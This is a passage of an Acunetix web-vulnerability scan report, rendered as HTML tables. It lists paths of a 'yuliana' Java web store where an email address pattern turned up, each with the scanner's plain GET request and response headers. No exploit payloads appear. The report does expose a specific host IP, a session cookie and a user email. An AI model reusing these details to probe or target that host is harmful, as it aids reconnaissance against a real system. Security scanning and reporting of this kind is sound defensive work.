<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">Check references for details on how to solve this problem.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Affected items</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/J5VbADdj4J.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/J5VbADdj4J.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/J5VbADdj4J.jsp<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:18 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/cart/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/cart/mFaJtb4ezt.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/cart/mFaJtb4ezt.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:41px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/cart/mFaJtb4ezt.jsp<br>Server: Apache-Coyote/1.1</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">39</td>
</tr>
</table>
<a name="PageN40"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:46px">
<td colspan="19" class="s43">Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:56 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/cart/displayCart</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/cart/displayCart HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/cart<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:08 GMT<br>Content-Length: 13981</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/cart/displayQuickOrder</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/cart/displayQuickOrder HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/registration/continueUser<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:07 GMT<br>Content-Length: 9288</td>
</tr>
<tr style="height:72px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">40</td>
</tr>
</table>
<a name="PageN41"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/catalog/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/catalog/e5nrCoiEQX.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/catalog/e5nrCoiEQX.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/catalog/e5nrCoiEQX.jsp<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:10 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/catalog/displayProduct</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/catalog/displayProduct HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/cart<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:07 GMT<br>Content-Length: 9288</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/customer_service.jsp</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com_julia1@yahoo.com_julia1@yahoo.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:79px">
<td colspan="19" class="s43">GET /yuliana/customer_service.jsp HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">41</td>
</tr>
</table>
<a name="PageN42"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:120px">
<td colspan="19" class="s43">Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Content-Length: 7316<br>Date: Sun, 26 Feb 2012 03:14:14 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/email/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/email/VUyxg2iQQF.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/email/VUyxg2iQQF.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/email/VUyxg2iQQF.jsp<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:27 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/email/join_email_list.jsp</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/email/join_email_list.jsp HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:82px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:14 GMT</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">42</td>
</tr>
</table>
<a name="PageN43"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:16px">
<td colspan="19" class="s43" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/error/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/error/nB4O85ZQsY.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/error/nB4O85ZQsY.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/error/nB4O85ZQsY.jsp<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:19:23 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/images/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/images/9fnGM9bz4P.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/images/9fnGM9bz4P.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/images/9fnGM9bz4P.jsp<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:11 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/partners/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/partners/yiJPC4Kngn.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/partners/yiJPC4Kngn.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:63px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/partners/yiJPC4Kngn.jsp<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">43</td>
</tr>
</table>
<a name="PageN44"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:31px">
<td colspan="19" class="s43">Date: Sun, 26 Feb 2012 03:15:13 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/partners/displayParnerLetter</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/partners/displayParnerLetter HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/partners<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Content-Length: 7938<br>Date: Sun, 26 Feb 2012 03:14:15 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/registration/kPDosjjhut.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/registration/kPDosjjhut.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/registration/kPDosjjhut.jsp<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:53 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/continueUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:49px">
<td colspan="19" class="s43">GET /yuliana/registration/continueUser HTTP/1.1<br>Pragma: no-cache</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">44</td>
</tr>
</table>
<a name="PageN45"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:150px">
<td colspan="19" class="s43">Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/registration/processUser<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Content-Length: 7086<br>Date: Sun, 26 Feb 2012 03:14:07 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/displayUserRegistration</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/registration/displayUserRegistration HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/user/validation/validateUser<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:05 GMT<br>Content-Length: 14507</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:155px">
<td colspan="19" class="s43">GET /yuliana/registration/processUser HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/registration/displayUserRegistration<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">45</td>
</tr>
</table>
<a name="PageN46"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:46px">
<td colspan="19" class="s43">Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:98px">
<td colspan="19" class="s43">HTTP/1.1 500 Internal Server Error<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:06 GMT<br>Connection: close<br>Content-Length: 6979</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/relatedDocs/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:54px">
<td colspan="19" class="s13">Tested on URI: /yuliana/relatedDocs/kckfU9oVVS.jsp <br><br>Pattern found in response: test@test.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/relatedDocs/kckfU9oVVS.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/relatedDocs/kckfU9oVVS.jsp<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:12 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/relatedDocs/relatedDocs.jsp</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/relatedDocs/relatedDocs.jsp HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Content-Length: 7074<br>Date: Sun, 26 Feb 2012 03:14:14 GMT</td>
</tr>
<tr style="height:58px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">46</td>
</tr>
</table>
<a name="PageN47"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
